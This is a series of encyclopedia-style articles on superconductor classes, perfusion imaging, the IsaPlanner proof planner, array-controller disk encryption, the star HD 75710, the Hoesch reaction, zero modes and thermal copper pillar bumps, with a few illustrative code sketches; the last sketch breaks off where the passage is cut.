yttrium-barium-copper oxides, especially YBa2Cu3O7. They are arguably the most famous high-temperature superconductors. Nickelates (RNiO2, R = rare-earth ion), in which the Sr-doped infinite-layer nickelate NdNiO2 undergoes a superconducting transition at 9–15 K, and in the same family the Ruddlesden–Popper-phase analog Nd6Ni5O12 (n = 5) becomes superconducting at 13 K. Note that this is not a complete list and is a topic of current research. Iron-based superconductors, including the oxypnictides. Magnesium diboride (MgB2), whose critical temperature is 39 K, making it the conventional superconductor with the highest known critical temperature. Non-cuprate oxides such as BKBO. Palladates – palladium compounds. Others, such as the "metallic" compounds and which are both superconductors below .
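The type I/type II distinction listed above has a standard quantitative criterion, not stated in the list itself: in Ginzburg–Landau theory it is governed by the ratio of the magnetic penetration depth to the coherence length. The following is the textbook form of that criterion.

```latex
% Standard Ginzburg--Landau criterion for the type I / type II distinction,
% with \lambda the penetration depth and \xi the coherence length.
\kappa = \frac{\lambda}{\xi}, \qquad
\begin{cases}
\kappa < 1/\sqrt{2} & \text{type I superconductor} \\[2pt]
\kappa > 1/\sqrt{2} & \text{type II superconductor}
\end{cases}
```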
See also Conventional superconductor covalent superconductors List of superconductors High-temperature superconductivity Room temperature superconductor Superconductivity Technological applications of superconductivity Timeline of low-temperature technology Type-I superconductor Type-II superconductor Type-1.5 superconductor Heavy fermion superconductor Organic superconductor Unconventional superconductor References Superconductivity
Superconductor classification
[ "Physics", "Materials_science", "Engineering" ]
877
[ "Physical quantities", "Superconductivity", "Materials science", "Condensed matter physics", "Electrical resistance and conductance" ]
16,434,531
https://en.wikipedia.org/wiki/Perfusion%20scanning
Perfusion is the passage of fluid through the lymphatic system or blood vessels to an organ or a tissue. The practice of perfusion scanning is the process by which this perfusion can be observed, recorded and quantified. The term perfusion scanning encompasses a wide range of medical imaging modalities. Applications With the ability to ascertain data on the blood flow to vital organs such as the heart and the brain, doctors are able to make quicker and more accurate choices about treatment for patients. Nuclear medicine has been leading perfusion scanning for some time, although the modality has certain pitfalls. It is often dubbed 'unclear medicine' as the scans produced may appear to the untrained eye as just fluffy and irregular patterns. More recent developments in CT and MRI have brought clearer images and solid quantitative data, such as graphs depicting blood flow and blood volume charted over a fixed period of time. Methods Microspheres CT MRI Nuclear medicine or NM Microsphere perfusion Using radioactive microspheres is an older method of measuring perfusion than the more recent imaging techniques. This process involves labeling microspheres with radioactive isotopes and injecting these into the test subject. Perfusion measurements are taken by comparing the radioactivity of selected regions within the body to the radioactivity of blood samples withdrawn at the time of microsphere injection. Later, techniques were developed to substitute fluorescent microspheres for the radioactively labeled ones. CT perfusion The method by which perfusion to an organ is measured by CT is still a relatively new concept, although the first dynamic imaging studies of cerebral perfusion were reported in 1979 by E. Ralph Heinz et al. from the Duke University Medical Center, Durham, North Carolina, itself citing a presentation on "Dynamic Computed Tomography" at the XI. Symposium Neuroradiologicum in Wiesbaden, June 4–10, 1978, which was not submitted to the conference proceedings. The original framework and principles for CT perfusion analysis were concretely laid out in 1980 by Leon Axel at the University of California San Francisco. It is most commonly carried out for neuroimaging using dynamic sequential scanning of a pre-selected region of the brain during the injection of a bolus of iodinated contrast material as it travels through the vasculature. Various mathematical models can then be used to process the raw temporal data to ascertain quantitative information such as the rate of cerebral blood flow (CBF) following an ischemic stroke or aneurysmal subarachnoid hemorrhage. Practical CT perfusion as performed on modern CT scanners was first described by Ken Miles, Mike Hayball and Adrian Dixon from Cambridge UK and subsequently developed by many individuals including Matthias Koenig and Ernst Klotz in Germany, and later by Max Wintermark in Switzerland and Ting-Yim Lee in Ontario, Canada. MRI perfusion There are different techniques of perfusion MRI, the most common being dynamic contrast-enhanced (DCE), dynamic susceptibility contrast imaging (DSC), and arterial spin labelling (ASL). In DSC, a gadolinium contrast agent (Gd) is injected (usually intravenously) and a time series of fast T2*-weighted images is acquired. As the gadolinium passes through the tissues, it induces a reduction of T2* in the nearby water protons; the corresponding decrease in signal intensity observed depends on the local Gd concentration, which may be considered a proxy for perfusion.
The acquired time series data are then postprocessed to obtain perfusion maps with different parameters, such as BV (blood volume), BF (blood flow), MTT (mean transit time) and TTP (time to peak); a simplified numerical sketch of this postprocessing is given at the end of this article. DCE-MRI also uses intravenous Gd contrast, but the time series is T1-weighted and gives increased signal intensity corresponding to the local Gd concentration. Modelling of DCE-MRI yields parameters related to vascular permeability and the extravasation transfer rate (see main article on perfusion MRI). Arterial spin labelling (ASL) has the advantage of not relying on an injected contrast agent, instead inferring perfusion from a drop in signal observed in the imaging slice arising from inflowing spins (outside the imaging slice) having been selectively saturated. A number of ASL schemes are possible, the simplest being flow-sensitive alternating inversion recovery (FAIR), which requires two acquisitions with identical parameters except for the out-of-slice saturation; the difference in the two images is theoretically only from inflowing spins, and may be considered a 'perfusion map'. NM perfusion Nuclear medicine uses radioactive isotopes for the diagnosis and treatment of patients. Whereas radiology provides data mostly on structure, nuclear medicine provides complementary information about function. All nuclear medicine scans give information to the referring clinician on the function of the system they are imaging. Specific techniques used are generally either of the following: Single-photon emission computed tomography (SPECT), which creates 3-dimensional images of the target organ or organ system. Scintigraphy, creating 2-dimensional images. Uses of NM perfusion scanning include ventilation/perfusion scans of the lungs, myocardial perfusion imaging of the heart, and functional brain imaging. Ventilation/perfusion scans Ventilation/perfusion scans, sometimes called VQ (V = ventilation, Q = perfusion) scans, are a way of identifying mismatched areas of blood and air supply to the lungs. They are primarily used to detect a pulmonary embolus. The perfusion part of the study uses a radioisotope tagged to the blood, which shows where in the lungs the blood is perfusing. If the scan shows any area missing a supply, this means there is a blockage which is not allowing the blood to perfuse that part of the organ. Myocardial perfusion imaging Myocardial perfusion imaging (MPI) is a form of functional cardiac imaging, used for the diagnosis of ischemic heart disease. The underlying principle is that under conditions of stress, diseased myocardium receives less blood flow than normal myocardium. MPI is one of several types of cardiac stress test. A cardiac-specific radiopharmaceutical is administered, e.g. 99mTc-tetrofosmin (Myoview, GE Healthcare) or 99mTc-sestamibi (Cardiolite, Bristol-Myers Squibb, now Lantheus Medical Imaging). Following this, the heart rate is raised to induce myocardial stress, either by exercise or pharmacologically with adenosine, dobutamine or dipyridamole (aminophylline can be used to reverse the effects of dipyridamole). SPECT imaging performed after stress reveals the distribution of the radiopharmaceutical, and therefore the relative blood flow to the different regions of the myocardium. Diagnosis is made by comparing stress images to a further set of images obtained at rest.
As the radionuclide redistributes slowly, it is not usually possible to perform both sets of images on the same day, hence a second attendance is required 1–7 days later (although, with a Tl-201 myocardial perfusion study with dipyridamole, rest images can be acquired as little as two hours post-stress). However, if stress imaging is normal, it is unnecessary to perform rest imaging, as it too will be normal – thus stress imaging is normally performed first. MPI has been demonstrated to have an overall accuracy of about 83% (sensitivity: 85%; specificity: 72%), and is comparable to (or better than) other non-invasive tests for ischemic heart disease, including stress echocardiography. Functional brain imaging Usually the gamma-emitting tracer used in functional brain imaging is technetium (99mTc) exametazime (99mTc-HMPAO, hexamethylpropylene amine oxime). Technetium-99m (99mTc) is a metastable nuclear isomer which emits gamma rays which can be detected by a gamma camera. When it is attached to exametazime, this allows 99mTc to be taken up by brain tissue in a manner proportional to brain blood flow, in turn allowing brain blood flow to be assessed with the nuclear gamma camera. Because blood flow in the brain is tightly coupled to local brain metabolism and energy use, 99mTc-exametazime (as well as the similar 99mTc-EC tracer) is used to assess brain metabolism regionally, in an attempt to diagnose and differentiate the different causal pathologies of dementia. Meta-analysis of many reported studies suggests that SPECT with this tracer is about 74% sensitive at diagnosing Alzheimer's disease, vs. 81% sensitivity for clinical exam (mental testing, etc.). More recent studies have shown accuracy of SPECT in Alzheimer diagnosis as high as 88%. In meta-analysis, SPECT was superior to clinical exam and clinical criteria (91% vs. 70%) in being able to differentiate Alzheimer's disease from vascular dementias. This latter ability relates to SPECT's imaging of local metabolism of the brain, in which the patchy loss of cortical metabolism seen in multiple strokes differs clearly from the more even or "smooth" loss of non-occipital cortical brain function typical of Alzheimer's disease. 99mTc-exametazime SPECT scanning competes with fludeoxyglucose (FDG) PET scanning of the brain, which works to assess regional brain glucose metabolism, to provide very similar information about local brain damage from many processes. SPECT is more widely available, for the basic reason that the radioisotope generation technology is longer-lasting and far less expensive in SPECT, and the gamma scanning equipment is less expensive as well. The reason for this is that 99mTc is extracted from relatively simple technetium-99m generators, which are delivered to hospitals and scanning centers weekly to supply fresh radioisotope, whereas FDG PET relies on FDG, which must be made in an expensive medical cyclotron and "hot-lab" (an automated chemistry lab for radiopharmaceutical manufacture) and then delivered directly to scanning sites, with the deliverable fraction of each trip limited by its naturally short 110-minute half-life. Testicular torsion detection Radionuclide scanning of the scrotum is the most accurate imaging technique to diagnose testicular torsion, but it is not routinely available. The agent of choice for this purpose is technetium-99m pertechnetate. Initially it provides a radionuclide angiogram, followed by a static image after the radionuclide has perfused the tissue.
In the healthy patient, initial images show symmetric flow to the testes, and delayed images show uniformly symmetric activity. See also Functional magnetic resonance imaging Ischemia-reperfusion injury of the appendicular musculoskeletal system MUGA scan Perfusion Positron emission tomography Stroke Ventilation/perfusion ratio References Medical tests Medical physics Medical imaging
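As promised above, a simplified numerical sketch of DSC postprocessing follows. It converts a T2*-weighted signal curve into a relaxation-rate change, taken as proportional to the local contrast-agent concentration, and reads off a relative BV and the TTP. Absolute quantification and CBF/MTT require an arterial input function and deconvolution, which are omitted; the echo time, timing grid and synthetic signal shape are illustrative assumptions, not values from any study.

```python
# Simplified DSC-MRI postprocessing sketch (illustrative values only; real
# pipelines need an arterial input function and deconvolution for CBF/MTT).
import numpy as np

TE = 0.030                    # echo time in seconds (assumed)
t = np.linspace(0, 60, 121)   # acquisition times in seconds (assumed grid)
s0 = 1000.0                   # mean pre-bolus baseline signal (assumed)

# Synthetic signal dip as the gadolinium bolus passes through the voxel.
signal = s0 * np.exp(-0.4 * (t / 12.0) ** 3 * np.exp(-t / 4.0))

# Signal -> relaxation-rate change: delta_R2*(t) = -ln(S/S0) / TE,
# proportional to the local contrast-agent concentration.
delta_r2s = -np.log(signal / s0) / TE

rel_bv = np.trapz(delta_r2s, t)   # relative blood volume: area under the curve
ttp = t[np.argmax(delta_r2s)]     # time to peak concentration
print(f"relative BV = {rel_bv:.2f}, TTP = {ttp:.1f} s")
```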
Perfusion scanning
[ "Physics" ]
2,341
[ "Applied and interdisciplinary physics", "Medical physics" ]
16,434,659
https://en.wikipedia.org/wiki/IsaPlanner
IsaPlanner is a proof planner for the interactive proof assistant, Isabelle. Originally developed by Lucas Dixon as part of his PhD thesis at the University of Edinburgh, it is now maintained by members of the Mathematical Reasoning Group, in the School of Informatics at Edinburgh. IsaPlanner is the latest of a series of proof planners written at Edinburgh. Earlier planners include Clam and LambdaClam. Features IsaPlanner allows the user to encode reasoning techniques, using a combinator language, for conjecturing and proving theorems. IsaPlanner works by manipulating reasoning states, records of open goals, the current proof plan and other important information, and combinators are functions mapping reasoning states to lazy lists of successor reasoning states. IsaPlanner's library supplies combinators for branching and iteration, amongst other tasks, and powerful reasoning techniques can be created by combining simpler reasoning techniques with these combinators. Several reasoning techniques come ready implemented within IsaPlanner, notably, IsaPlanner features an implementation of dynamic rippling, a rippling heuristic capable of working in higher order settings, a best-first rippling heuristic and a reasoning technique for proofs by induction. Additional features include an interactive tracing tool, for manually stepping through proof attempts and a module for viewing and manipulating hierarchical proofs. Planned features Features currently being implemented, or planned for the future, are an expanded set of proof critics, suitable for use in higher order domains, dynamic relational rippling, a rippling heuristic suitable for rippling over relational expressions as opposed to functional expressions, again suitable for use in higher order domains, and integration of IsaPlanner with Proof General. References External links IsaPlanner project page Mathematical Reasoning Group Automated theorem proving
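IsaPlanner itself is written in the Isabelle/ML dialect, but the combinator idea described above can be sketched in a few lines of Python by treating a reasoning technique as a function from a reasoning state to a lazy stream of successor states. The names below are hypothetical illustrations, not IsaPlanner's actual API.

```python
# Sketch of reasoning-technique combinators over lazy streams of states.
# Hypothetical names; IsaPlanner's real combinators live in Isabelle/ML.
from typing import Callable, Iterator

Technique = Callable[[object], Iterator[object]]

def then(t1: Technique, t2: Technique) -> Technique:
    """Apply t1, then apply t2 to every resulting reasoning state."""
    def combined(state):
        for s1 in t1(state):
            yield from t2(s1)
    return combined

def orelse(t1: Technique, t2: Technique) -> Technique:
    """Try t1; fall back to t2 only if t1 yields no successor states."""
    def combined(state):
        produced = False
        for s in t1(state):
            produced = True
            yield s
        if not produced:
            yield from t2(state)
    return combined

def repeat(t: Technique) -> Technique:
    """Apply t for as long as it keeps producing successor states."""
    def combined(state):
        stalled = True
        for s in t(state):
            stalled = False
            yield from combined(s)
        if stalled:
            yield state   # fixed point: t can make no further progress
    return combined
```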
IsaPlanner
[ "Mathematics" ]
363
[ "Mathematical logic", "Computational mathematics", "Automated theorem proving" ]
16,436,055
https://en.wikipedia.org/wiki/Array%20controller%20based%20encryption
Within a storage network, encryption of data may occur at different hardware levels. Array controller based encryption describes the encryption of data occurring at the disk array controller before being sent to the disk drives. This article provides an overview of different implementation techniques for array controller based encryption. For cryptographic and encryption theory, see disk encryption theory. Possible points of encryption in SAN The encryption of data can take place at many points in a storage network. The point of encryption may occur on the host computer, in the SAN infrastructure, the array controller or on each of the hard disks, as shown on the diagram above. Each point of encryption has different merits and costs. Within the diagram, the key server components are also shown for each configuration of encryption. Designers of SANs and SAN components must take into consideration factors such as performance, deployment complexity, key server interoperability, strength of security, and cost when choosing where to implement encryption. Since the array controller is a natural central point for all data, however, encryption at this level is a natural fit and also reduces deployment complexity. Array controller-based encryption Different configurations of a hardware or software array controller lead to different types of solutions for this kind of encryption. Each of these solutions can be built into existing infrastructures by replacing or upgrading certain components. Basic components include an encryption key server, a key management client, and commonly an encryption unit, all of which are implemented within the storage network. Internal array controller encryption For an internal array controller configuration, the array controller is generally a PCI bus card situated inside the host computer. As shown in the diagram, the PCI array controller would contain an encryption unit where plaintext data is encrypted into ciphertext. This separate encryption unit is used to minimize performance loss and maintain data throughput. Furthermore, the Key Management Client is generally an additional service running on the host computer, where it authenticates all keys retrieved from the Key Server. A major disadvantage of this type of implementation is that encryption components must be integrated into each host computer, which is redundant on large networks with many host devices. External array controller encryption In the case of an external array controller setup, the array controller is an independent hardware module connected to the network. Within the hardware array controller would be an encryption unit for data encryption as well as a Key Management Client for authentication. Generally, a few hardware array controllers serve many host devices and storage disks; implementing encryption in these few components therefore reduces deployment complexity. Moreover, the lifecycle of an array controller is generally much longer than that of host computers and storage disks, so the encryption implementation need not be replaced as often as it would if encryption were done at another point in the storage network. Encryption at the front-end or back-end side array controller In an external array controller, the encryption unit can be placed either on the front-end side or the back-end side of the array controller.
There are different advantages and disadvantages to placing the encryption unit on the front-end side or the back-end side. The placement of the encryption unit can strongly affect the security of a controller-based encryption implementation, so this issue must be taken into account at design time to mitigate security risks. Software array controller encryption In software array controller encryption, a software array controller driver directs data to individual host bus adapters. In the adjacent diagram, there are multiple host bus adapters with hardware encryption units used for better performance. In contrast, this type of encryption can also be implemented with only one host bus adapter connected to a network of multiple hard drives and would still function, though performance is reduced since only one encryption unit processes all data. Key management is handled much as in the internal array controller encryption described above, with the Key Management Client implemented as a service on the host computer. References External links PM8031 Encryption Enabled IC PM8032 Encryption Enabled IC Cryptography
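For the encryption unit itself, disk-oriented designs typically use a length-preserving, sector-tweaked cipher mode such as AES-XTS (see disk encryption theory). The sketch below, assuming the Python cryptography package, shows the kind of per-sector operation an array controller performs in hardware; the key, sector contents and byte-order choice for the tweak are placeholders for illustration.

```python
# Per-sector AES-XTS encryption sketch, analogous to what an array
# controller's encryption unit does in hardware. Assumes the Python
# "cryptography" package; key and sector contents are placeholders.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(64)  # AES-256-XTS uses a double-length (512-bit) key

def encrypt_sector(sector_number: int, plaintext: bytes) -> bytes:
    # The tweak binds the ciphertext to its sector, so identical plaintext
    # stored in different sectors encrypts to different ciphertext.
    tweak = sector_number.to_bytes(16, "little")
    encryptor = Cipher(algorithms.AES(key), modes.XTS(tweak)).encryptor()
    return encryptor.update(plaintext) + encryptor.finalize()

ciphertext = encrypt_sector(42, os.urandom(512))  # one 512-byte disk sector
```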
Array controller based encryption
[ "Mathematics", "Engineering" ]
797
[ "Applied mathematics", "Cryptography", "Cybersecurity engineering" ]
16,436,236
https://en.wikipedia.org/wiki/HD%2075710
HD 75710 is a single star in the constellation of Vela. It has an apparent visual magnitude of approximately 4.94, which is bright enough to be faintly visible to the naked eye. Based upon an annual parallax shift of , it is located about 1,200 light-years from the Sun. The stellar classification of this star is A2 III, indicating it is in the giant stage of its stellar evolution. It has a high rate of spin, with a projected rotational velocity of 110 km/s, giving the star an oblate shape with an equatorial radius 7% larger than the polar radius. HD 75710 is radiating 914 times the Sun's luminosity from its photosphere at an effective temperature of . References A-type giants Vela (constellation) Velorum, g CD-44 04861 075710 043347 3520
HD 75710
[ "Astronomy" ]
186
[ "Vela (constellation)", "Constellations" ]
16,437,233
https://en.wikipedia.org/wiki/Hoesch%20reaction
The Hoesch reaction or Houben–Hoesch reaction is an organic reaction in which a nitrile reacts with an arene compound to form an aryl ketone. The reaction is a type of Friedel–Crafts acylation with hydrogen chloride and a Lewis acid catalyst. The synthesis of 2,4,6-trihydroxyacetophenone (THAP) from phloroglucinol is representative. If two equivalents of the nitrile are added, 2,4-diacetylphloroglucinol is the product. An imine can be isolated as an intermediate reaction product. The attacking electrophile is possibly a protonated nitrilium-type species of the form [R–C≡N–H]+ Cl−. The arene must be electron-rich, i.e. of the phenol or aniline type. A related reaction is the Gattermann reaction, in which hydrocyanic acid is used instead of a nitrile. The reaction is named after Kurt Hoesch and Josef Houben, who reported this new reaction type in 1915 and 1926, respectively. Mechanism The mechanism of the reaction involves two steps. The first step is a nucleophilic addition to the nitrile with the aid of a polarizing Lewis acid, forming an imine, which is later hydrolyzed during the aqueous workup to yield the final aryl ketone (summarized in the scheme below). See also Stephen aldehyde synthesis Gattermann reaction The Hoesch reaction is demonstrated in the synthesis of buflomedil. References Substitution reactions Name reactions
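The two mechanistic steps described above can be summarized in a reaction scheme. The LaTeX below assumes the mhchem package; Ar–H denotes the electron-rich arene, and the HCl/ZnCl2 conditions are the classical ones named in the article.

```latex
% Hoesch reaction summary (assumes \usepackage[version=4]{mhchem}).
% Step 1: Lewis-acid-assisted addition of the arene to the nitrile -> ketimine
\ce{Ar-H + R-C#N ->[\text{HCl, ZnCl2}] Ar-C(=NH)-R}
% Step 2: hydrolysis of the ketimine during aqueous workup -> aryl ketone
\ce{Ar-C(=NH)-R ->[\text{H2O}] Ar-C(=O)-R + NH3}
```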
Hoesch reaction
[ "Chemistry" ]
315
[ "Coupling reactions", "Name reactions", "Organic reactions" ]
16,437,548
https://en.wikipedia.org/wiki/Zero%20mode
In physics, a zero mode is an eigenvector with a vanishing eigenvalue. In various subfields of physics zero modes appear whenever a physical system possesses a certain symmetry. For example, the normal modes of a multidimensional harmonic oscillator (e.g. a system of beads arranged around a circle and connected by springs) correspond to the elementary vibrational modes of the system. In such a system a zero mode typically occurs and is associated with a rigid rotation around the circle. The kernel of an operator consists of its right zero modes, and the cokernel consists of its left zero modes. References Linear algebra
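The beads-on-a-circle example above can be made concrete numerically: the stiffness matrix of N equal beads joined by identical springs around a circle is a circulant Laplacian, and its zero mode is the uniform displacement vector corresponding to rigid rotation. A minimal numpy sketch (unit masses and spring constants assumed):

```python
# Zero mode of N beads on a circle connected by identical springs.
# The stiffness (Laplacian) matrix K is circulant: 2 on the diagonal,
# -1 for each neighbour, with periodic wrap-around.
import numpy as np

N = 6
K = 2 * np.eye(N) - np.roll(np.eye(N), 1, axis=1) - np.roll(np.eye(N), -1, axis=1)

eigenvalues, eigenvectors = np.linalg.eigh(K)
print(np.round(eigenvalues, 10))   # the smallest eigenvalue is exactly 0

# The eigenvector of the zero eigenvalue is uniform: every bead displaces
# equally along the ring, i.e. a rigid rotation, which costs no energy.
zero_mode = eigenvectors[:, 0]
print(np.round(zero_mode, 3))      # proportional to (1, 1, ..., 1)/sqrt(N)
```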
Zero mode
[ "Mathematics" ]
128
[ "Linear algebra", "Algebra" ]
16,437,835
https://en.wikipedia.org/wiki/Thermal%20copper%20pillar%20bump
A thermal copper pillar bump, also known as a "thermal bump", is a thermoelectric device made from thin-film thermoelectric material embedded in flip chip interconnects (in particular copper pillar solder bumps) for use in electronics and optoelectronic packaging, including: flip chip packaging of CPU and GPU integrated circuits (chips), laser diodes, and semiconductor optical amplifiers (SOA). Unlike conventional solder bumps that provide an electrical path and a mechanical connection to the package, thermal bumps act as solid-state heat pumps and add thermal management functionality locally on the surface of a chip or to another electrical component. A typical thermal bump is 238 μm in diameter and 60 μm high. Thermal bumps use the thermoelectric effect, which is the direct conversion of temperature differences to electric voltage and vice versa. Simply put, a thermoelectric device creates a voltage when there is a temperature difference between its two sides and, conversely, creates a temperature difference when a voltage is applied to it. This effect can be used to generate electricity, to measure temperature, to cool objects, or to heat them. For each bump, thermoelectric cooling (TEC) occurs when a current is passed through the bump. The thermal bump pulls heat from one side of the device and transfers it to the other as current is passed through the material. This is known as the Peltier effect. The direction of heating and cooling is determined by the direction of current flow and the sign of the majority electrical carrier in the thermoelectric material. Thermoelectric power generation (TEG), on the other hand, occurs when the thermal bump is subjected to a temperature gradient (i.e., the top is hotter than the bottom). In this instance, the device generates current, converting heat into electrical power. This is termed the Seebeck effect. The thermal bump was developed by Nextreme Thermal Solutions as a method for integrating active thermal management functionality at the chip level in the same manner that transistors, resistors and capacitors are integrated in conventional circuit designs today. Nextreme chose the copper pillar bump as an integration strategy due to its widespread acceptance by Intel, Amkor and other industry leaders as the method for connecting microprocessors and other advanced electronics devices to various surfaces during a process referred to as "flip-chip" packaging. The thermal bump can be integrated as a part of the standard flip-chip process (Figure 1) or integrated as discrete devices. The efficiency of a thermoelectric device is measured by the heat moved (or pumped) divided by the amount of electrical power supplied to move this heat. This ratio is termed the coefficient of performance or COP and is a measured characteristic of a thermoelectric device. The COP is inversely related to the temperature difference that the device produces. As a cooling device is moved further away from the heat source, parasitic losses between the cooler and the heat source necessitate additional cooling power: the greater the distance between source and cooler, the more cooling is required. For this reason, the cooling of electronic devices is most efficient when it occurs closest to the source of the heat generation. Use of the thermal bump does not displace system-level cooling, which is still needed to move heat out of the system; rather it introduces a fundamentally new methodology for achieving temperature uniformity at the chip and board level.
In this manner, overall thermal management of the system becomes more efficient. In addition, while conventional cooling solutions scale with the size of the system (bigger fans for bigger systems, etc.), the thermal bump can scale at the chip level by using more thermal bumps in the overall design. A brief history of solder and flip chip/chip scale packaging Solder bumping technology (the process of joining a chip to a substrate without shorting, using solder) was first conceived and implemented by IBM in the early 1960s. Three versions of this type of solder joining were developed. The first was to embed copper balls in the solder bumps to provide a positive stand-off. The second solution, developed by Delco Electronics (General Motors) in the late 1960s, was similar to embedding copper balls except that the design employed a rigid silver bump. The bump provided a positive stand-off and was attached to the substrate by means of solder that was screen-printed onto the substrate. The third solution was to use a screened glass dam near the electrode tips to act as a "stop-off" to prevent the ball solder from flowing down the electrode. By then the Ball Limiting Metallurgy (BLM) with a high-lead (Pb) solder system and a copper ball had proven to work well. Therefore, the ball was simply removed and the solder evaporation process extended to form pure solder bumps that were approximately 125 μm high. This system became known as the controlled collapse chip connection (C3 or C4). Until the mid-1990s, this type of flip-chip assembly was practiced almost exclusively by IBM and Delco. Around this time, Delco sought to commercialize its technology and formed Flip Chip Technologies with Kulicke & Soffa Industries as a partner. At the same time, MCNC (which had developed a plated version of IBM's C4 process) received funding from DARPA to commercialize its technology. These two organizations, along with APTOS (Advanced Plating Technologies on Silicon), formed the nascent out-sourcing market. During this same time, companies began to look at reducing or streamlining their packaging, from the earlier multi-chip-on-ceramic packages that IBM had originally developed C4 to support, to what were referred to as Chip Scale Packages (CSP). There were a number of companies developing products in this area. These products could usually be put into one of two camps: either they were scaled-down versions of the multi-chip on ceramic package (of which the Tessera package would be one example), or they were the streamlined versions developed by Unitive Electronics et al. (where the package wiring had been transferred to the chip, and after bumping, they were ready to be placed). One of the issues with the CSP type of package (which was intended to be soldered directly to an FR4 or flex circuit) was that for high-density interconnects, the soft solder bump provided less of a stand-off as the solder bump diameter and pitch were decreased. Different solutions were employed, including one developed by Focus Interconnect Technology (former APTOS engineers), which used a high-aspect-ratio plated copper post to provide a larger fixed standoff than was possible for a soft solder collapse joint. Today, flip chip is a well established technology and collapsed soft solder connections are used in the vast majority of assemblies. The copper post stand-off developed for the CSP market has found a home in high-density interconnects for advanced micro-processors and is used today by IBM for its CPU packaging.
Copper pillar solder bumping Trends in high-density interconnects have led to the use of copper pillar solder bumps (CPB) for CPU and GPU packaging. CPBs are an attractive replacement for traditional solder bumps because they provide a fixed stand-off independent of pitch. This is extremely important as most of the high-end products are underfilled, and a smaller standoff may create difficulties in getting the underfill adhesive to flow under the die. Figure 2 shows an example of a CPB fabricated by Intel and incorporated into their Presler line of microprocessors, among others. The cross-section shows on-chip copper and a copper pillar (approximately 60 μm high) electrically connected through an opening (or via) in the chip passivation layer at the top of the picture. At the bottom is another copper trace on the package substrate, with solder between the two copper layers. Thin-film thermoelectric technology Thin films are thin material layers ranging from fractions of a nanometer to several micrometers in thickness. Thin-film thermoelectric materials are grown by conventional semiconductor deposition methods and fabricated using conventional semiconductor micro-fabrication techniques. Thin-film thermoelectrics have been demonstrated to provide high heat pumping capacity that far exceeds the capacities provided by traditional bulk pellet TE products. The benefit of thin films versus bulk materials for thermoelectric manufacturing is expressed in Equation 1, where Qmax (the maximum heat pumped by a module) is inversely proportional to the thickness of the film, L, for a given active area A: Qmax ∝ A/L (Eq. 1). As such, TE coolers manufactured with thin films can easily have 10x–20x higher Qmax values for a given active area A. This makes thin-film TECs ideally suited for applications involving high heat-flux flows. In addition to the increased heat pumping capability, the use of thin films allows for truly novel implementation of TE devices. Instead of a bulk module that is 1–3 mm in thickness, a thin-film TEC can be fabricated less than 100 μm in thickness. In its simplest form, the P or N leg of a TE couple (the basic building block of all thin-film TE devices) is a layer of thin-film TE material with a solder layer above and below, providing electrical and thermal functionality. Thermal copper pillar bump The thermal bump is compatible with the existing flip-chip manufacturing infrastructure, extending the use of conventional solder bumped interconnects to provide active, integrated cooling of a flip-chipped component using the widely accepted copper pillar bumping process. The result is higher performance and efficiency within the existing semiconductor manufacturing paradigm. The thermal bump also enables power generating capabilities within copper pillar bumps for energy recycling applications. Thermal bumps have been shown to achieve a temperature differential of 60 °C between the top and bottom headers; demonstrated heat-pumping capabilities exceeding 150 W/cm²; and, when subjected to heat, have demonstrated the capability to generate up to 10 mW of power per bump. Thermal copper pillar bump structure Figure 3 shows an SEM cross-section of a TE leg. Here it is demonstrated that the thermal bump is structurally identical to a CPB with an extra layer, the TE layer, incorporated into the stack-up. The addition of the TE layer transforms a standard copper pillar bump into a thermal bump.
This element, when properly configured electrically and thermally, provides active thermoelectric heat transfer from one side of the bump to the other side. The direction of heat transfer is dictated by the doping type of the thermoelectric material (either a P-type or N-type semiconductor) and the direction of electric current passing through the material. This type of thermoelectric heat transfer is known as the Peltier effect. Conversely, if heat is allowed to pass from one side of the thermoelectric material to the other, a current will be generated in the material in a phenomenon known as the Seebeck effect. The Seebeck effect is essentially the reverse of the Peltier effect. In this mode, electrical power is generated from the flow of heat in the TE element. The structure shown in Figure 3 is capable of operating in both the Peltier and Seebeck modes, though not simultaneously. Figure 4 shows a schematic of a typical CPB and a thermal bump for comparison. These structures are similar, with both having copper pillars and solder connections. The primary difference between the two is the introduction of either a P- or N-type thermoelectric layer between two solder layers. The solders used with CPBs and thermal bumps can be any one of a number of commonly used solders including, but not limited to, Sn, SnPb eutectic, SnAg or AuSn. Figure 5 shows a device equipped with a thermal bump. The thermal flow is shown by the arrows labeled "heat." Metal traces, which can be several micrometres high, can be stacked or interdigitated to provide highly conductive pathways for collecting heat from the underlying circuit and funneling that heat to the thermal bump. The metal traces shown in the figure for conducting electric current into the thermal bump may or may not be directly connected to the circuitry of the chip. In the case where there are electrical connections to the chip circuitry, on-board temperature sensors and driver circuitry can be used to control the thermal bump in a closed-loop fashion to maintain optimal performance. In addition, the heat that is pumped by the thermal bump, together with the extra heat created by the thermal bump in the course of pumping it, needs to be rejected into the substrate or board. Since the performance of the thermal bump can be improved by providing a good thermal path for the rejected heat, it is beneficial to provide highly thermally conductive pathways on the backside of the thermal bump. The substrate could be a highly conductive ceramic substrate like AlN or a metal (e.g., Cu, CuW, CuMo, etc.) with a dielectric. In this case, the high thermal conductance of the substrate will act as a natural pathway for the rejected heat. The substrate might also be a multilayer substrate like a printed wiring board (PWB) designed to provide a high-density interconnect. In this case, the thermal conductivity of the PWB may be relatively poor, so adding thermal vias (e.g. metal plugs) can provide excellent pathways for the rejected heat. Applications Thermal bumps can be used in a number of different ways to provide chip cooling and power generation. General cooling Thermal bumps can be evenly distributed across the surface of a chip to provide a uniform cooling effect. In this case, the thermal bumps may be interspersed with standard bumps that are used for signal, power and ground. This allows the thermal bumps to be placed directly under the active circuitry of the chip for maximum effectiveness.
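How much heat a single bump can pump, the figure that drives the bump-count decisions discussed next, can be estimated with a minimal single-leg Peltier model: Peltier pumping at the cold junction opposed by Joule heating and by conduction back through the TE layer. The sketch below is illustrative only; the 238 μm diameter comes from the article, but the film thickness, material constants, and drive current are assumptions chosen for a plausible thin-film bismuth-telluride leg, not Nextreme specifications.

```python
# Minimal textbook model of one thermal bump acting as a Peltier cooler.
# Illustrative assumptions only: material constants, film thickness, and
# drive current are placeholders, not measured device parameters.
import math

S = 200e-6      # Seebeck coefficient, V/K (typical Bi2Te3-class value)
sigma = 8.0e4   # electrical conductivity, S/m (assumed)
kappa = 1.5     # thermal conductivity, W/(m*K) (assumed)

d = 238e-6                     # bump diameter from the article, m
A = math.pi * (d / 2) ** 2     # active area, ~4.4e-8 m^2
L = 20e-6                      # TE film thickness, m (assumed)

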